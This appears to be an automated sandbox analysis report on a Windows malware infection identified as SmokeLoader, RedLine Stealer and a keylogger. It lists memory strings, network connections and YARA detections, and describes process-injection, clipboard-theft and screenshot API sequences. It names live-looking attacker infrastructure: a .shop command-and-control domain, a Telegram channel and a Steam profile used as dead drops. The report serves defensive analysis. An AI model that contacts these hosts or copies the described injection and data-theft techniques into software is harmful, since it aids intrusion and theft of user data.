Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
Source: kat2225.tmp, 00000009.00000002.3157954757.0000000000422000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899r0isMozilla/5.0
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/about/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/explore/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/legal/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/mobile
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/news/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/points/shop/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/stats/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: GDHIII.9.dr String found in binary or memory: https://support.mozilla.org
Source: GDHIII.9.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: A247.exe, 00000005.00000003.2427616680.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: GDHIII.9.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: 5358.exe, 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, 5358.exe, 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, 5358.exe, 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.0000000000422000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/copterwin
Source: kat2225.tmp, 00000009.00000002.3157954757.0000000000422000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/copterwinr0isMozilla/5.0
Source: A247.exe, 00000005.00000002.2872028176.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000002.2872028176.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/%%
Source: A247.exe, 00000005.00000003.2384817568.0000000000909000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/(
Source: A247.exe, 00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/_o5e
Source: A247.exe, 00000005.00000003.2384817568.0000000000909000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/api
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000002.2872028176.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/r
Source: explorer.exe, 00000002.00000000.2038509404.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2038509404.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: GDHIII.9.dr String found in binary or memory: https://www.mozilla.org
Source: GDHIII.9.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: GDHIII.9.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: A247.exe, 00000005.00000003.2427616680.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.3023097464.000000001BFB9000.00000004.00000020.00020000.00000000.sdmp, GDHIII.9.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: GDHIII.9.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: A247.exe, 00000005.00000003.2427616680.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.3023097464.000000001BFB9000.00000004.00000020.00020000.00000000.sdmp, GDHIII.9.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: A247.exe, 00000005.00000003.2427616680.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.3023097464.000000001BFB9000.00000004.00000020.00020000.00000000.sdmp, GDHIII.9.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.67.133.187:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49738 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 5_2_0042EAB0
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 5_2_0042EAB0
Contains functionality to record screenshots
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0042EC90 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 5_2_0042EC90
Yara detected Keylogger Generic
Source: Yara match File source: 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5358.exe PID: 4296, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 8.2.5358.exe.4387719.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.5358.exe.2590000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.5358.exe.4387719.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.5358.exe.45b0000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.5358.exe.45b0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.5358.exe.2590000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.2056416748.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2319506605.0000000002EAB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2319383367.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.2056350311.0000000002D4B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.2871870285.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Abnormal high CPU Usage
Source: C:\Windows\explorer.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401615
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401658
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00403406 NtTerminateProcess,GetModuleHandleA, 0_2_00403406
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401620
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401524
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040162D
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401635
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401615
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401658
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_00403406 NtTerminateProcess,GetModuleHandleA, 4_2_00403406
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401620
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401524
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_0040162D
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401635
Source: C:\Users\user\AppData\Local\Temp\5358.exe Code function: 8_2_043B9B10 NtProtectVirtualMemory,NtProtectVirtualMemory, 8_2_043B9B10
Source: C:\Users\user\AppData\Local\Temp\5358.exe Code function: 8_2_043BA4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess, 8_2_043BA4F0
Source: C:\Users\user\AppData\Local\Temp\5358.exe Code function: 8_2_043B9850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification, 8_2_043B9850
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00427353 5_2_00427353
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_004016E0 5_2_004016E0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00420880 5_2_00420880
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00404970 5_2_00404970
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0041FD10 5_2_0041FD10
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0043B050 5_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00426174 5_2_00426174
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_004061F0 5_2_004061F0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00426284 5_2_00426284
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_004223B8 5_2_004223B8
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00405440 5_2_00405440
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0040F400 5_2_0040F400
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_004164D2 5_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00433480 5_2_00433480
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00403570 5_2_00403570
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00421580 5_2_00421580
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_004067B0 5_2_004067B0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_004089A0 5_2_004089A0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00424B80 5_2_00424B80
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00421C71 5_2_00421C71
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00425CEE 5_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00440D36 5_2_00440D36
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0043AD30 5_2_0043AD30
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00407DF0 5_2_00407DF0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00404EF0 5_2_00404EF0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00435EB0 5_2_00435EB0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00632067 5_2_00632067
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00618057 5_2_00618057
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00615157 5_2_00615157
